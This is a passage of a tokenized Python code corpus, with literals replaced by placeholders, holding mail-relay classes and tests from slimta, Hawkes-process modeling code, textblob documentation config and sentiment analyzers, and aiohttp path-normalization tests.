'<STR_LIT>' <EOL> TYPE_SUBPREMISE = '<STR_LIT>' <EOL> TYPE_TRANSIT_STATION = '<STR_LIT>' <EOL> AC_TYPE_GEOCODE = '<STR_LIT>' <EOL> AC_TYPE_ADDDRESS = '<STR_LIT:address>' <EOL> AC_TYPE_ESTABLISHMENT = '<STR_LIT>' <EOL> AC_TYPE_REGIONS = '<STR_LIT>' <EOL> AC_TYPE_CITIES = '<STR_LIT>' </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import <EOL> from slimta . core import SlimtaError <EOL> from slimta . smtp . reply import Reply <EOL> from slimta . policy import RelayPolicy <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> class RelayError ( SlimtaError ) : <EOL> def __init__ ( self , msg , reply = None ) : <EOL> super ( RelayError , self ) . __init__ ( msg ) <EOL> if reply : <EOL> self . reply = reply <EOL> else : <EOL> reply_msg = '<STR_LIT:U+0020>' . join ( ( self . _default_esc , msg ) ) <EOL> self . reply = Reply ( self . _default_code , reply_msg ) <EOL> class PermanentRelayError ( RelayError ) : <EOL> """<STR_LIT>""" <EOL> _default_code = '<STR_LIT>' <EOL> _default_esc = '<STR_LIT>' <EOL> class TransientRelayError ( RelayError ) : <EOL> """<STR_LIT>""" <EOL> _default_code = '<STR_LIT>' <EOL> _default_esc = '<STR_LIT>' <EOL> class Relay ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . relay_policies = [ ] <EOL> def add_policy ( self , policy ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( policy , RelayPolicy ) : <EOL> self . relay_policies . append ( policy ) <EOL> else : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> def _run_policies ( self , envelope ) : <EOL> for policy in self . relay_policies : <EOL> policy . apply ( envelope ) <EOL> def _attempt ( self , envelope , attempts ) : <EOL> self . _run_policies ( envelope ) <EOL> return self . attempt ( envelope , attempts ) <EOL> def attempt ( self , envelope , attempts ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def kill ( self ) : <EOL> """<STR_LIT>""" <EOL> pass </s>
<s> import unittest2 as unittest <EOL> from slimta . envelope import Envelope <EOL> from slimta . bounce import Bounce <EOL> from slimta . smtp . reply import Reply <EOL> class TestBounce ( unittest . TestCase ) : <EOL> def test_bounce ( self ) : <EOL> env = Envelope ( '<STR_LIT>' , [ '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) <EOL> env . parse ( b"""<STR_LIT>""" ) <EOL> reply = Reply ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> Bounce . header_template = """<STR_LIT>""" <EOL> Bounce . footer_template = """<STR_LIT>""" <EOL> bounce = Bounce ( env , reply ) <EOL> self . assertEqual ( '<STR_LIT>' , bounce . sender ) <EOL> self . assertEqual ( [ '<STR_LIT>' ] , bounce . recipients ) <EOL> self . assertEqual ( '<STR_LIT>' , bounce . headers [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( '<STR_LIT>' , bounce . headers [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( '<STR_LIT>' , bounce . headers [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( b"""<STR_LIT>""" . replace ( b'<STR_LIT:\n>' , b'<STR_LIT:\r\n>' ) , bounce . message ) <EOL> def test_bounce_headersonly ( self ) : <EOL> env = Envelope ( '<STR_LIT>' , [ '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) <EOL> env . parse ( b"""<STR_LIT>""" ) <EOL> reply = Reply ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> Bounce . header_template = """<STR_LIT>""" <EOL> Bounce . footer_template = """<STR_LIT>""" <EOL> bounce = Bounce ( env , reply , headers_only = True ) <EOL> self . assertEqual ( '<STR_LIT>' , bounce . sender ) <EOL> self . assertEqual ( [ '<STR_LIT>' ] , bounce . recipients ) <EOL> self . assertEqual ( '<STR_LIT>' , bounce . headers [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( '<STR_LIT>' , bounce . headers [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( '<STR_LIT>' , bounce . headers [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( b"""<STR_LIT>""" . replace ( b'<STR_LIT:\n>' , b'<STR_LIT:\r\n>' ) , bounce . message ) </s>
<s> import unittest2 as unittest <EOL> from mox3 . mox import MoxTestBase <EOL> from pycares . errno import ARES_ENOTFOUND , ARES_ENODATA <EOL> from slimta . relay import PermanentRelayError <EOL> from slimta . relay . smtp . mx import MxSmtpRelay , NoDomainError <EOL> from slimta . relay . smtp . static import StaticSmtpRelay <EOL> from slimta . util . dns import DNSResolver , DNSError <EOL> from slimta . envelope import Envelope <EOL> class FakeAsyncResult ( object ) : <EOL> def __init__ ( self , answer = None ) : <EOL> self . answer = answer <EOL> def get ( self ) : <EOL> return self . answer <EOL> class FakeMxAnswer ( object ) : <EOL> def __init__ ( self , expired , rdata ) : <EOL> class FakeMxRdata ( object ) : <EOL> def __init__ ( self , priority , host ) : <EOL> self . priority = priority <EOL> self . host = host <EOL> self . ttl = float ( '<STR_LIT>' ) if expired else float ( '<STR_LIT>' ) <EOL> self . rdata = [ FakeMxRdata ( * rr ) for rr in rdata ] <EOL> def __iter__ ( self ) : <EOL> return iter ( self . rdata ) <EOL> class FakeAAnswer ( object ) : <EOL> def __init__ ( self , expired , rdata ) : <EOL> class FakeARdata ( object ) : <EOL> def __init__ ( self , address ) : <EOL> self . host = address <EOL> self . ttl = float ( '<STR_LIT>' ) if expired else float ( '<STR_LIT>' ) <EOL> self . rdata = [ FakeARdata ( * rr ) for rr in rdata ] <EOL> def __iter__ ( self ) : <EOL> return iter ( self . rdata ) <EOL> class TestMxSmtpRelay ( unittest . TestCase , MoxTestBase ) : <EOL> def test_get_rcpt_domain ( self ) : <EOL> env = Envelope ( '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> mx = MxSmtpRelay ( ) <EOL> self . assertEqual ( '<STR_LIT>' , mx . _get_rcpt_domain ( env ) ) <EOL> def test_get_rcpt_domain_error ( self ) : <EOL> env = Envelope ( '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> mx = MxSmtpRelay ( ) <EOL> self . assertRaises ( NoDomainError , mx . _get_rcpt_domain , env ) <EOL> def test_choose_mx ( self ) : <EOL> records = [ ( <NUM_LIT:1> , <NUM_LIT:1> ) , ( <NUM_LIT:2> , <NUM_LIT:2> ) , ( <NUM_LIT:3> , <NUM_LIT:3> ) , ( <NUM_LIT:4> , <NUM_LIT:4> ) , ( <NUM_LIT:5> , <NUM_LIT:5> ) ] <EOL> mx = MxSmtpRelay ( ) <EOL> self . assertEqual ( <NUM_LIT:1> , mx . choose_mx ( records , <NUM_LIT:0> ) ) <EOL> self . assertEqual ( <NUM_LIT:5> , mx . choose_mx ( records , <NUM_LIT:4> ) ) <EOL> self . assertEqual ( <NUM_LIT:1> , mx . choose_mx ( records , <NUM_LIT:5> ) ) <EOL> self . assertEqual ( <NUM_LIT:3> , mx . choose_mx ( records , <NUM_LIT:7> ) ) <EOL> self . assertEqual ( <NUM_LIT:2> , mx . choose_mx ( records , <NUM_LIT> ) ) <EOL> def test_attempt ( self ) : <EOL> env = Envelope ( '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> mx_ret = FakeMxAnswer ( False , [ ( <NUM_LIT:5> , '<STR_LIT>' ) , <EOL> ( <NUM_LIT:10> , '<STR_LIT>' ) ] ) <EOL> mx = MxSmtpRelay ( ) <EOL> static = self . mox . CreateMock ( StaticSmtpRelay ) <EOL> self . mox . StubOutWithMock ( mx , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( DNSResolver , '<STR_LIT>' ) <EOL> DNSResolver . query ( '<STR_LIT>' , '<STR_LIT>' ) . AndReturn ( FakeAsyncResult ( mx_ret ) ) <EOL> mx . new_static_relay ( '<STR_LIT>' , <NUM_LIT> ) . AndReturn ( static ) <EOL> static . attempt ( env , <NUM_LIT:0> ) <EOL> mx . new_static_relay ( '<STR_LIT>' , <NUM_LIT> ) . AndReturn ( static ) <EOL> static . attempt ( env , <NUM_LIT:1> ) <EOL> self . mox . ReplayAll ( ) <EOL> mx . attempt ( env , <NUM_LIT:0> ) <EOL> mx . attempt ( env , <NUM_LIT:1> ) <EOL> def test_attempt_no_mx ( self ) : <EOL> env = Envelope ( '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> a_ret = FakeAAnswer ( False , [ ( '<STR_LIT>' , ) ] ) <EOL> mx = MxSmtpRelay ( ) <EOL> static = self . mox . CreateMock ( StaticSmtpRelay ) <EOL> self . mox . StubOutWithMock ( mx , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( DNSResolver , '<STR_LIT>' ) <EOL> DNSResolver . query ( '<STR_LIT>' , '<STR_LIT>' ) . AndRaise ( DNSError ( ARES_ENOTFOUND ) ) <EOL> DNSResolver . query ( '<STR_LIT>' , '<STR_LIT:A>' ) . AndReturn ( FakeAsyncResult ( a_ret ) ) <EOL> mx . new_static_relay ( '<STR_LIT>' , <NUM_LIT> ) . AndReturn ( static ) <EOL> static . attempt ( env , <NUM_LIT:0> ) <EOL> self . mox . ReplayAll ( ) <EOL> mx . attempt ( env , <NUM_LIT:0> ) <EOL> def test_attempt_no_records ( self ) : <EOL> env = Envelope ( '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> mx = MxSmtpRelay ( ) <EOL> self . mox . StubOutWithMock ( mx , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( DNSResolver , '<STR_LIT>' ) <EOL> DNSResolver . query ( '<STR_LIT>' , '<STR_LIT>' ) . AndRaise ( DNSError ( ARES_ENOTFOUND ) ) <EOL> DNSResolver . query ( '<STR_LIT>' , '<STR_LIT:A>' ) . AndRaise ( DNSError ( ARES_ENOTFOUND ) ) <EOL> self . mox . ReplayAll ( ) <EOL> with self . assertRaises ( PermanentRelayError ) : <EOL> mx . attempt ( env , <NUM_LIT:0> ) <EOL> def test_attempt_expiredmx ( self ) : <EOL> env = Envelope ( '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> mx_ret = FakeMxAnswer ( True , [ ( <NUM_LIT:10> , '<STR_LIT>' ) , <EOL> ( <NUM_LIT:5> , '<STR_LIT>' ) ] ) <EOL> mx = MxSmtpRelay ( ) <EOL> static = self . mox . CreateMock ( StaticSmtpRelay ) <EOL> self . mox . StubOutWithMock ( mx , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( DNSResolver , '<STR_LIT>' ) <EOL> DNSResolver . query ( '<STR_LIT>' , '<STR_LIT>' ) . AndReturn ( FakeAsyncResult ( mx_ret ) ) <EOL> mx . new_static_relay ( '<STR_LIT>' , <NUM_LIT> ) . AndReturn ( static ) <EOL> static . attempt ( env , <NUM_LIT:0> ) <EOL> DNSResolver . query ( '<STR_LIT>' , '<STR_LIT>' ) . AndReturn ( FakeAsyncResult ( mx_ret ) ) <EOL> mx . new_static_relay ( '<STR_LIT>' , <NUM_LIT> ) . AndReturn ( static ) <EOL> static . attempt ( env , <NUM_LIT:1> ) <EOL> self . mox . ReplayAll ( ) <EOL> mx . attempt ( env , <NUM_LIT:0> ) <EOL> mx . attempt ( env , <NUM_LIT:1> ) <EOL> def test_attempt_force_mx ( self ) : <EOL> env = Envelope ( '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> mx = MxSmtpRelay ( ) <EOL> static = self . mox . CreateMock ( StaticSmtpRelay ) <EOL> self . mox . StubOutWithMock ( mx , '<STR_LIT>' ) <EOL> mx . new_static_relay ( '<STR_LIT>' , <NUM_LIT> ) . AndReturn ( static ) <EOL> static . attempt ( env , <NUM_LIT:0> ) <EOL> static . attempt ( env , <NUM_LIT:1> ) <EOL> self . mox . ReplayAll ( ) <EOL> mx . force_mx ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> mx . attempt ( env , <NUM_LIT:0> ) <EOL> mx . attempt ( env , <NUM_LIT:1> ) <EOL> def test_attempt_no_answer ( self ) : <EOL> env = Envelope ( '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> mx = MxSmtpRelay ( ) <EOL> self . mox . StubOutWithMock ( mx , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( DNSResolver , '<STR_LIT>' ) <EOL> DNSResolver . query ( '<STR_LIT>' , '<STR_LIT>' ) . AndRaise ( DNSError ( ARES_ENODATA ) ) <EOL> DNSResolver . query ( '<STR_LIT>' , '<STR_LIT:A>' ) . AndRaise ( DNSError ( ARES_ENODATA ) ) <EOL> self . mox . ReplayAll ( ) <EOL> with self . assertRaises ( PermanentRelayError ) : <EOL> mx . attempt ( env , <NUM_LIT:0> ) </s>
<s> import numpy as np <EOL> np . random . seed ( <NUM_LIT> ) <EOL> np . seterr ( over = "<STR_LIT>" ) <EOL> import matplotlib . pyplot as plt <EOL> from pybasicbayes . util . general import ibincount <EOL> from pybasicbayes . util . text import progprint_xrange <EOL> import pyhawkes . models <EOL> reload ( pyhawkes . models ) <EOL> K = <NUM_LIT:10> <EOL> B = <NUM_LIT:3> <EOL> dt = <NUM_LIT:1> <EOL> dt_max = <NUM_LIT> <EOL> T = <NUM_LIT> <EOL> network_hypers = { '<STR_LIT>' : <NUM_LIT:1.> , '<STR_LIT:p>' : <NUM_LIT:1.> , '<STR_LIT:v>' : <NUM_LIT> } <EOL> dt_model = pyhawkes . models . DiscreteTimeNetworkHawkesModelSpikeAndSlab ( K = K , dt = dt , dt_max = dt_max , B = B , <EOL> network_hypers = network_hypers ) <EOL> assert dt_model . check_stability ( ) <EOL> S_dt , _ = dt_model . generate ( T = int ( np . ceil ( T / dt ) ) , keep = False ) <EOL> print "<STR_LIT>" , S_dt . sum ( ) , "<STR_LIT>" <EOL> print "<STR_LIT>" , dt_model . heldout_log_likelihood ( S_dt ) <EOL> S_ct = dt * np . concatenate ( [ ibincount ( S ) for S in S_dt . T ] ) . astype ( float ) <EOL> S_ct += dt * np . random . rand ( * S_ct . shape ) <EOL> assert np . all ( S_ct < T ) <EOL> C_ct = np . concatenate ( [ k * np . ones ( S . sum ( ) ) for k , S in enumerate ( S_dt . T ) ] ) . astype ( int ) <EOL> perm = np . argsort ( S_ct ) <EOL> S_ct = S_ct [ perm ] <EOL> C_ct = C_ct [ perm ] <EOL> ct_model = pyhawkes . models . ContinuousTimeNetworkHawkesModel ( K , dt_max = <NUM_LIT:1.> , <EOL> network_hypers = network_hypers ) <EOL> ct_model . add_data ( S_ct , C_ct , T ) <EOL> ct_model . bias_model . lambda0 = dt_model . bias_model . lambda0 <EOL> ct_model . weight_model . A = dt_model . weight_model . A <EOL> ct_model . weight_model . W = dt_model . weight_model . W <EOL> print "<STR_LIT>" , ct_model . heldout_log_likelihood ( S_ct , C_ct , T ) <EOL> ct_lls = [ ct_model . log_likelihood ( ) ] <EOL> N_samples = <NUM_LIT:100> <EOL> for itr in progprint_xrange ( N_samples , perline = <NUM_LIT> ) : <EOL> ct_model . resample_model ( ) <EOL> ct_lls . append ( ct_model . log_likelihood ( ) ) <EOL> assert np . all ( ct_model . weight_model . A == <NUM_LIT:1> ) <EOL> dt_model_test = pyhawkes . models . DiscreteTimeNetworkHawkesModelSpikeAndSlab ( K = K , dt = dt , dt_max = dt_max , B = B , <EOL> network_hypers = network_hypers ) <EOL> dt_model_test . add_data ( S_dt ) <EOL> dt_lls = [ ] <EOL> for itr in progprint_xrange ( N_samples , perline = <NUM_LIT> ) : <EOL> dt_model_test . resample_model ( ) <EOL> dt_lls . append ( dt_model_test . log_likelihood ( ) ) <EOL> assert np . all ( dt_model_test . weight_model . A == <NUM_LIT:1> ) <EOL> plt . figure ( ) <EOL> plt . plot ( ct_lls , '<STR_LIT:b>' ) <EOL> plt . plot ( dt_lls , '<STR_LIT:r>' ) <EOL> plt . show ( ) </s>
<s> import os <EOL> import abc <EOL> import numpy as np <EOL> import scipy . linalg <EOL> import scipy . signal as sig <EOL> class Basis ( object ) : <EOL> __metaclass__ = abc . ABCMeta <EOL> def __init__ ( self , B , dt , dt_max , <EOL> orth = False , <EOL> norm = False , <EOL> allow_instantaneous = False ) : <EOL> self . B = B <EOL> self . dt = dt <EOL> self . dt_max = dt_max <EOL> self . orth = orth <EOL> self . norm = norm <EOL> self . allow_instantaneous = allow_instantaneous <EOL> self . basis = self . interpolate_basis ( self . create_basis ( ) , self . dt , self . dt_max , self . norm ) <EOL> self . L = self . basis . shape [ <NUM_LIT:0> ] <EOL> @ abc . abstractmethod <EOL> def create_basis ( self ) : <EOL> raise NotImplementedError ( ) <EOL> def convolve_with_basis ( self , S ) : <EOL> """<STR_LIT>""" <EOL> ( T , K ) = S . shape <EOL> ( R , B ) = self . basis . shape <EOL> F = np . empty ( ( T , K , B ) ) <EOL> for b in np . arange ( B ) : <EOL> F [ : , : , b ] = sig . fftconvolve ( S , <EOL> np . reshape ( self . basis [ : , b ] , ( R , <NUM_LIT:1> ) ) , <EOL> '<STR_LIT>' ) [ : T , : ] <EOL> if np . amin ( self . basis ) >= <NUM_LIT:0> and np . amin ( S ) >= <NUM_LIT:0> : <EOL> np . clip ( F , <NUM_LIT:0> , np . inf , out = F ) <EOL> assert np . amin ( F ) >= <NUM_LIT:0> , "<STR_LIT>" <EOL> return F <EOL> def interpolate_basis ( self , basis , dt , dt_max , <EOL> norm = True ) : <EOL> L , B = basis . shape <EOL> t_int = np . arange ( <NUM_LIT:0.0> , dt_max , step = dt ) <EOL> t_bas = np . linspace ( <NUM_LIT:0.0> , dt_max , L ) <EOL> ibasis = np . zeros ( ( len ( t_int ) , B ) ) <EOL> for b in np . arange ( B ) : <EOL> ibasis [ : , b ] = np . interp ( t_int , t_bas , basis [ : , b ] ) <EOL> if norm : <EOL> ibasis /= ( dt * np . sum ( ibasis , axis = <NUM_LIT:0> ) ) <EOL> if not self . allow_instantaneous : <EOL> ibasis = np . vstack ( ( np . zeros ( ( <NUM_LIT:1> , B ) ) , ibasis ) ) <EOL> return ibasis <EOL> def create_basis ( self ) : <EOL> raise NotImplementedError ( "<STR_LIT>" ) <EOL> class CosineBasis ( Basis ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , <EOL> B , dt , dt_max , <EOL> orth = False , <EOL> norm = True , <EOL> allow_instantaneous = False , <EOL> n_eye = <NUM_LIT:0> , <EOL> a = <NUM_LIT:1.0> / <NUM_LIT> , <EOL> b = <NUM_LIT:0.5> , <EOL> L = <NUM_LIT:100> ) : <EOL> self . n_eye = n_eye <EOL> self . a = a <EOL> self . b = b <EOL> self . L = L <EOL> super ( CosineBasis , self ) . __init__ ( B , dt , dt_max , orth , norm , allow_instantaneous ) <EOL> def create_basis ( self ) : <EOL> n_pts = self . L <EOL> n_cos = self . B - self . n_eye <EOL> n_eye = self . n_eye <EOL> assert n_cos >= <NUM_LIT:0> and n_eye >= <NUM_LIT:0> <EOL> n_bas = n_eye + n_cos <EOL> basis = np . zeros ( ( n_pts , n_bas ) ) <EOL> basis [ : n_eye , : n_eye ] = np . eye ( n_eye ) <EOL> a = self . a <EOL> b = self . b <EOL> nlin = lambda t : np . log ( a * t + b ) <EOL> u_ir = nlin ( np . arange ( n_pts ) ) <EOL> ctrs = u_ir [ np . floor ( np . linspace ( n_eye , ( n_pts / <NUM_LIT> ) , n_cos ) ) . astype ( np . int ) ] <EOL> if len ( ctrs ) == <NUM_LIT:1> : <EOL> w = ctrs / <NUM_LIT:2> <EOL> else : <EOL> w = ( ctrs [ - <NUM_LIT:1> ] - ctrs [ <NUM_LIT:0> ] ) / ( n_cos - <NUM_LIT:1> ) <EOL> basis_fn = lambda u , c , w : ( np . cos ( np . maximum ( - np . pi , np . minimum ( np . pi , ( u - c ) * np . pi / w / <NUM_LIT> ) ) ) + <NUM_LIT:1> ) / <NUM_LIT> <EOL> for i in np . arange ( n_cos ) : <EOL> basis [ : , n_eye + i ] = basis_fn ( u_ir , ctrs [ i ] , w ) <EOL> if self . orth : <EOL> basis = scipy . linalg . orth ( basis ) <EOL> if self . norm : <EOL> if np . any ( basis < <NUM_LIT:0> ) : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> basis = basis / np . tile ( np . sum ( basis , axis = <NUM_LIT:0> ) , [ n_pts , <NUM_LIT:1> ] ) / ( <NUM_LIT:1.0> / n_pts ) <EOL> return basis <EOL> class IdentityBasis ( Basis ) : <EOL> def __init__ ( self , <EOL> dt , dt_max , <EOL> norm = True , <EOL> allow_instantaneous = False ) : <EOL> self . dt = dt <EOL> self . dt_max = dt_max <EOL> self . allow_instantaneous = allow_instantaneous <EOL> self . norm = norm <EOL> self . B = int ( dt_max // dt ) <EOL> if allow_instantaneous : <EOL> self . B += <NUM_LIT:1> <EOL> self . L = dt_max // dt + <NUM_LIT:1> <EOL> self . basis = self . create_basis ( ) <EOL> def create_basis ( self ) : <EOL> ibasis = np . eye ( self . B ) <EOL> if not self . allow_instantaneous : <EOL> ibasis = np . vstack ( ( np . zeros ( ( <NUM_LIT:1> , self . B ) ) , ibasis ) ) <EOL> assert ibasis . shape == ( self . L , self . B ) <EOL> if self . norm : <EOL> ibasis /= ( self . dt * np . sum ( ibasis , axis = <NUM_LIT:0> ) ) <EOL> return ibasis </s>
<s> import datetime as dt <EOL> import os <EOL> import sys <EOL> sys . path . insert ( <NUM_LIT:0> , os . path . abspath ( '<STR_LIT:..>' ) ) <EOL> import textblob <EOL> sys . path . append ( os . path . abspath ( "<STR_LIT>" ) ) <EOL> extensions = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> primary_domain = '<STR_LIT>' <EOL> default_role = '<STR_LIT>' <EOL> issues_github_path = '<STR_LIT>' <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> master_doc = '<STR_LIT:index>' <EOL> project = u'<STR_LIT>' <EOL> copyright = u'<STR_LIT>' . format ( <EOL> dt . datetime . utcnow ( ) <EOL> ) <EOL> version = release = textblob . __version__ <EOL> exclude_patterns = [ '<STR_LIT>' ] <EOL> pygments_style = '<STR_LIT>' <EOL> html_theme = '<STR_LIT>' <EOL> html_theme_path = [ '<STR_LIT>' ] <EOL> html_static_path = [ '<STR_LIT>' ] <EOL> html_sidebars = { <EOL> '<STR_LIT:index>' : [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] <EOL> } <EOL> htmlhelp_basename = '<STR_LIT>' <EOL> latex_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> man_pages = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> [ u'<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> ] <EOL> texinfo_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> ] </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import <EOL> from collections import namedtuple <EOL> import nltk <EOL> from textblob . en import sentiment as pattern_sentiment <EOL> from textblob . tokenizers import word_tokenize <EOL> from textblob . decorators import requires_nltk_corpus <EOL> from textblob . base import BaseSentimentAnalyzer , DISCRETE , CONTINUOUS <EOL> class PatternAnalyzer ( BaseSentimentAnalyzer ) : <EOL> """<STR_LIT>""" <EOL> kind = CONTINUOUS <EOL> RETURN_TYPE = namedtuple ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def analyze ( self , text ) : <EOL> """<STR_LIT>""" <EOL> return self . RETURN_TYPE ( * pattern_sentiment ( text ) ) <EOL> def _default_feature_extractor ( words ) : <EOL> """<STR_LIT>""" <EOL> return dict ( ( ( word , True ) for word in words ) ) <EOL> class NaiveBayesAnalyzer ( BaseSentimentAnalyzer ) : <EOL> """<STR_LIT>""" <EOL> kind = DISCRETE <EOL> RETURN_TYPE = namedtuple ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def __init__ ( self , feature_extractor = _default_feature_extractor ) : <EOL> super ( NaiveBayesAnalyzer , self ) . __init__ ( ) <EOL> self . _classifier = None <EOL> self . feature_extractor = feature_extractor <EOL> @ requires_nltk_corpus <EOL> def train ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( NaiveBayesAnalyzer , self ) . train ( ) <EOL> neg_ids = nltk . corpus . movie_reviews . fileids ( '<STR_LIT>' ) <EOL> pos_ids = nltk . corpus . movie_reviews . fileids ( '<STR_LIT>' ) <EOL> neg_feats = [ ( self . feature_extractor ( <EOL> nltk . corpus . movie_reviews . words ( fileids = [ f ] ) ) , '<STR_LIT>' ) for f in neg_ids ] <EOL> pos_feats = [ ( self . feature_extractor ( <EOL> nltk . corpus . movie_reviews . words ( fileids = [ f ] ) ) , '<STR_LIT>' ) for f in pos_ids ] <EOL> train_data = neg_feats + pos_feats <EOL> self . _classifier = nltk . classify . NaiveBayesClassifier . train ( train_data ) <EOL> def analyze ( self , text ) : <EOL> """<STR_LIT>""" <EOL> super ( NaiveBayesAnalyzer , self ) . analyze ( text ) <EOL> tokens = word_tokenize ( text , include_punc = False ) <EOL> filtered = ( t . lower ( ) for t in tokens if len ( t ) >= <NUM_LIT:3> ) <EOL> feats = self . feature_extractor ( filtered ) <EOL> prob_dist = self . _classifier . prob_classify ( feats ) <EOL> return self . RETURN_TYPE ( <EOL> classification = prob_dist . max ( ) , <EOL> p_pos = prob_dist . prob ( '<STR_LIT>' ) , <EOL> p_neg = prob_dist . prob ( "<STR_LIT>" ) <EOL> ) </s>
<s> from aiohttp import web <EOL> import pytest <EOL> from aiohttp_utils import path_norm , CONFIG_KEY <EOL> from aiohttp_utils . path_norm import normalize_path_middleware <EOL> from . conftest import make_dummy_handler <EOL> @ pytest . fixture ( ) <EOL> def app ( loop ) : <EOL> return web . Application ( loop = loop ) <EOL> @ pytest . fixture ( ) <EOL> def client ( create_client , app ) : <EOL> return create_client ( app ) <EOL> def add_routes ( app ) : <EOL> app . router . add_route ( '<STR_LIT:GET>' , '<STR_LIT:/>' , make_dummy_handler ( ) ) <EOL> app . router . add_route ( '<STR_LIT:GET>' , '<STR_LIT>' , make_dummy_handler ( ) ) <EOL> def handler1 ( req ) : <EOL> raise web . HTTPNotFound ( ) <EOL> def handler2 ( req ) : <EOL> pass <EOL> app . router . add_route ( "<STR_LIT:GET>" , '<STR_LIT>' , handler1 ) <EOL> app . router . add_route ( "<STR_LIT:GET>" , "<STR_LIT>" , handler2 ) <EOL> def configure_app ( app , overrides = None , setup = False ) : <EOL> overrides = overrides or { } <EOL> add_routes ( app ) <EOL> if setup : <EOL> path_norm . setup ( app , ** overrides ) <EOL> else : <EOL> middleware = path_norm . normalize_path_middleware ( ** overrides ) <EOL> app . middlewares . append ( middleware ) <EOL> class TestNormalizePathMiddleware : <EOL> @ pytest . mark . parametrize ( '<STR_LIT>' , [ True , False ] ) <EOL> def test_appends_slash_by_default ( self , app , client , setup ) : <EOL> configure_app ( app , overrides = None , setup = setup ) <EOL> res = client . get ( '<STR_LIT>' ) <EOL> assert res . status_code == <NUM_LIT:200> <EOL> res = client . get ( '<STR_LIT>' ) <EOL> assert res . status_code == <NUM_LIT> <EOL> res = res . follow ( ) <EOL> assert res . request . path_qs == '<STR_LIT>' <EOL> @ pytest . mark . parametrize ( '<STR_LIT>' , [ True , False ] ) <EOL> def test_merges_slash_by_default ( self , app , client , setup ) : <EOL> configure_app ( app , overrides = None , setup = setup ) <EOL> res = client . get ( '<STR_LIT>' ) <EOL> assert res . status_code == <NUM_LIT:200> <EOL> res = client . get ( '<STR_LIT>' ) <EOL> assert res . status_code == <NUM_LIT> <EOL> res = res . follow ( ) <EOL> assert res . request . path_qs == '<STR_LIT>' <EOL> @ pytest . mark . parametrize ( '<STR_LIT>' , [ True , False ] ) <EOL> def test_append_slash_false_not_found ( self , app , client , setup ) : <EOL> configure_app ( app , { <EOL> '<STR_LIT>' : False <EOL> } , setup = setup ) <EOL> res = client . get ( '<STR_LIT>' , expect_errors = True ) <EOL> assert res . status_code == <NUM_LIT> <EOL> def test_append_slash ( self , app , client ) : <EOL> configure_app ( app , { <EOL> '<STR_LIT>' : True <EOL> } ) <EOL> res = client . get ( '<STR_LIT>' ) <EOL> assert res . status_code == <NUM_LIT:200> <EOL> res = client . get ( '<STR_LIT>' ) <EOL> assert res . status_code == <NUM_LIT> <EOL> res = res . follow ( ) <EOL> assert res . request . path_qs == '<STR_LIT>' <EOL> def test_append_slash_with_query_string ( self , app , client ) : <EOL> configure_app ( app , { <EOL> '<STR_LIT>' : True <EOL> } ) <EOL> res = client . get ( '<STR_LIT>' ) <EOL> assert res . status_code == <NUM_LIT> <EOL> res = res . follow ( ) <EOL> assert res . status_code == <NUM_LIT:200> <EOL> assert res . request . path_qs == '<STR_LIT>' <EOL> @ pytest . mark . parametrize ( '<STR_LIT:url>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def test_merge_slashes ( self , app , client , url ) : <EOL> configure_app ( app , { <EOL> '<STR_LIT>' : True <EOL> } ) <EOL> res = client . get ( url ) <EOL> assert res . status_code == <NUM_LIT> <EOL> res = res . follow ( ) <EOL> assert res . request . path_qs == '<STR_LIT>' <EOL> def test_404_if_request_has_body ( self , app , client ) : <EOL> configure_app ( app , { '<STR_LIT>' : True , '<STR_LIT>' : True } ) <EOL> res = client 